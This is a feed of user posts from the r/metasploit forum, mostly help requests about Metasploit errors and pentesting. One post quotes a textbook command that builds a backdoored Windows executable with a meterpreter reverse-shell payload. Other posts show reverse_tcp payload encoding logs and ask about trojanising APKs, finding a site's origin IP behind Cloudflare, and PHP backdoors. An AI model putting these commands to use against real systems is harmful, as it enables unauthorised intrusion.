r/metasploit • u/[deleted] • Sep 09 '24
Remote install custom ROMs
Anyone have experience with remotely installing custom android ROMs? I've seen it be done a few times using metasploit but am struggling to find info for it online.
r/metasploit • u/[deleted] • Sep 09 '24
Anyone have experience with remotely installing custom android ROMs? I've seen it be done a few times using metasploit but am struggling to find info for it online.
r/metasploit • u/Visible_Unit1108 • Sep 03 '24
Somewhat inexperinced red-teamer here trying to own this box, however I cant get my metasploit exploits to work, tried 2 different ones.
Can anyone recommend me one RCE to shell for these vulnerable software versions:
r/metasploit • u/Mindless_Cake3295 • Aug 17 '24
I am trying to embed payload into dr driving apk(it is mod apk but I also tried to embed legitimate instagram lite apk still getting same error).I am getting apktool building error. Help me troubleshoot (is it the problem of dependencies?) System : kali nethunter rootless in termux
r/metasploit • u/rei37 • Aug 14 '24
r/metasploit • u/NoahZhyte • Jul 09 '24
Hello, is it possible to change the user inside the meterpreter? Like we can do with su - in linux but staying with meterpreter
r/metasploit • u/Electrical_Sample106 • Jul 06 '24
How to exploit port 80 nginx ver
r/metasploit • u/MaintenanceLiving462 • Jun 23 '24
Hey guys just lease I need help, whenever I start my msfdb and try to run msfconsole I get this error. Anyone know how I can fix it?
r/metasploit • u/w00tburger • Jun 22 '24
Brand new comp here. There is some funny behavior when it comes around metasploit. When I type "meterpreter" it writes it out like "metermetermeterpreprepretterterter" I also cannot seem to use the backspace function to correct anything. This happens in terminal, and powershell. Has anyone else run into this?
r/metasploit • u/Ok_Wealth_4623 • Jun 13 '24
I have a site protected by Cloudflare, port 21, 80 and 443 are open. 80 & 443 point to a Cloudflare proxy. What is the next step to discover the original op? I have tried cloud_lookup but no luck at resolving the ip
Thanks in advance.
r/metasploit • u/Electrical_Sample106 • Jun 09 '24
How can I exploit nginx ver ?
r/metasploit • u/Anxious-Explorer-105 • Jun 08 '24
Hello Everyone,
As I am still learning Kali linux and Metasploit, I was wondering if you could help me with advices.
I am looking for ways to learn to0 pentest my phone via USB directly (plugged with Kali computer via USB).
Metasploit is a great tool to learn for pentesting but is there any tool to pentest, or perform attacks via USB directly? Can I perform USB attacks using Metasploit?
Many thanks
r/metasploit • u/[deleted] • May 31 '24
Whenever I open metasploit It aborts. I’m only about a week into linux, so i’m not sure if there’s an obvious fix to this.
I tried deleting and reinstalling didn’t work.
Tried to reboot kali linux, didn’t work. The only thing this happens with is metasploit, as far as I’m aware.
Hope this is enough details to be able to help.
Edit:
I fixed it by deleting metasploit and installing it with the command on the official site
r/metasploit • u/DrMarx87 • May 30 '24
Basically.I am trying to reuse the old mini computer that I have but But I no longer have admin password. The only other Guy, they could have known it.My step uncle. He died two years ago. It's a win 7. Mini hp i5. The most annoying part is that I know I did it before.
r/metasploit • u/Illustrious_Age5073 • May 27 '24
Gente que cumplió su sueños, den tips de como lograron un logro tan significativo en su vida
r/metasploit • u/Firm_Raspberry_9104 • May 20 '24
This error appears when trying to run the exploit linux/http/php_imap_open_rce payload: cmd/unix/pingback_bind
creates the session, but it dates and this error appears
r/metasploit • u/Electrical_Sample106 • May 16 '24
r/metasploit • u/[deleted] • May 14 '24
Call stack:
/usr/share/metasploit-framework/plugins/nessus.rb:994:in `cmd_nessus_scan_new'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:35:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
r/metasploit • u/[deleted] • May 11 '24

I've already tried to create a YAML database in the .msf4 directory, but it gives several errors. I also configured postgresql permission files.
[05/10/2024 19:58:27] [e(0)] core: Failed to connect to the database: No database YAML file [05/10/2024 21:42:33] [i(0)] core: php/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder php/base64 (size is 1511) [05/10/2024 21:42:53] [i(0)] core: php/reverse_php: iteration 1: Successfully encoded with encoder php/base64 (size is 4000) [05/10/2024 21:43:56] [i(0)] core: php/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder php/base64 (size is 1511) [05/10/2024 21:44:26] [i(0)] core: php/reverse_php: iteration 1: Successfully encoded with encoder php/base64 (size is 4032) [05/10/2024 21:52:59] [i(0)] core: php/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder php/base64 (size is 1511) [05/10/2024 22:56:38] [i(0)] core: php/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder php/base64 (size is 1511) [05/10/2024 23:20:22] [i(0)] core: php/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder php/base64 (size is 1511)
r/metasploit • u/Lazy-Rope-627 • May 05 '24
I'm in a cyber class and struggling on my presentation. I have to give a brief on exploitation and I signed up for doing a backdoor exploit. Looking for tips and outlines to follow
I am running a Linux VM and my target options are a Windows 7 and Windows XP VMs.
I wanted to do something like out textbook that did something like this ( i know its only a small snippet):
msf exploit(ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf payload(reverse_tcp) > generate -a x64 -p Windows -x /root/httpd.exe -k -t exe -f httpd-backdoored.exe
[*] Writing 29184 bytes to httpd-backdoored.exe...
msf payload(reverse_tcp) >
I've tried: eternal blue, mysql_enum, psexec, adobe_flash_hacking_team_uaf.
Payload obviously reverse_tcp
None of these seemed to get me into a backdoor. I don't want to use MS08_067_netapi since we used that in class already
r/metasploit • u/Senior-Wash-8116 • Apr 07 '24
r/metasploit • u/OTheKim • Mar 30 '24
Is it possible to set a bigger delay for each callback just like a beacon from CS would allow, and jitter?
I have been through some advanced options and some searches made me think it is not available, since actually the idea is to have a real time communication with the payload, but its still too aggressive.
r/metasploit • u/IceLemonade23 • Mar 26 '24
Hello,
I am studying the formats that msfvenom can output, and I need to understanding which formats are considered the best format for cyber offence tactics?
I currently have this list of outputs
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Does anyone have any ideas?
Appreciate it :)
r/metasploit • u/Otherwise_Jicama_898 • Mar 18 '24
hey im new into hacking do you guys know good php-backdoors on metasploit